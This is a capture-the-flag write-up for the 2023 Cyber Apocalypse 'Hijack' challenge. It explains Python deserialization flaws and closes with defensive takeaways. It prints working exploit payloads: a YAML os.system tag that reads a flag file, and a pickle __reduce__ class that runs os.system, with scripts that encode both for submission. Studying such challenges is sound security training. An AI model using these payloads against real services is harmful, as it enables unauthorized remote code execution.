2023 Cyber Apocalypse: Hijack

#htb #ctf #misc #deserialization #yaml #pickle #rce

Challenge Information

AttributeDetails
Event2023 Cyber Apocalypse
CategoryMisc
ChallengeHijack

Summary

This challenge demonstrates two dangerous deserialization vulnerabilities in Python: unsafe YAML parsing and pickle deserialization. Both can lead to arbitrary code execution when processing untrusted data.

Analysis

Vulnerability 1: YAML Deserialization

YAML’s tag syntax allows instantiation of arbitrary Python objects. The !!python/object/apply tag can invoke functions during deserialization:

!!python/object/apply:os.system [ "cd /ctf; cat flag.txt" ]

This YAML payload will call os.system() with the provided command during parsing.

Vulnerability 2: Pickle Deserialization

Python’s pickle format can serialize function calls. By defining a class that overrides __reduce__(), we can execute arbitrary code during unpickling:

class Exploit(Config):
    def __reduce__(self):
        return (os.system, ('ls',))


payload = pickle.dumps(Exploit('1', 'on', '1', '1', '1f'))

Solution

YAML Exploitation:

import yaml
import base64


payload_yaml = '''
!!python/object/apply:os.system [ "cd /ctf; cat flag.txt" ]
'''


encoded_payload = base64.b64encode(payload_yaml.encode("utf-8")).decode("utf-8")
print(encoded_payload)


# To exploit: Pass base64-encoded payload to vulnerable application
# The application will decode and parse it with yaml.load()

Pickle Exploitation:

import os
import pickle
import base64


class Config:
    def __init__(self, IR_spectrometer_temp, auto_calibration, propulsion_temp, solar_array_temp, units):
        self.IR_spectrometer_temp = IR_spectrometer_temp
        self.auto_calibration = auto_calibration
        self.propulsion_temp = propulsion_temp
        self.solar_array_temp = solar_array_temp
        self.units = units


class Exploit(Config):
    def __reduce__(self):
        return (os.system, ('ls',))


payload = pickle.dumps(Exploit('1', 'on', '1', '1', '1f'))
encoded_payload = base64.b64encode(payload)
print(encoded_payload)


# To exploit: Pass base64-encoded payload to vulnerable application
# The application will decode and unpickle it with pickle.loads()

Exploitation process:

  1. Create payload (YAML or Pickle)
  2. Encode with base64
  3. Submit to vulnerable endpoint
  4. Application deserializes and executes code

Key Takeaways

  • Never deserialize untrusted data
  • YAML with yaml.load() is dangerous; use yaml.safe_load()
  • Python’s pickle is not safe for untrusted data
  • Deserialization attacks lead to Remote Code Execution (RCE)
  • Always validate and sanitize input before processing
  • Use safe serialization formats (JSON) with safe parsers
  • Implement strict type checking if deserialization is necessary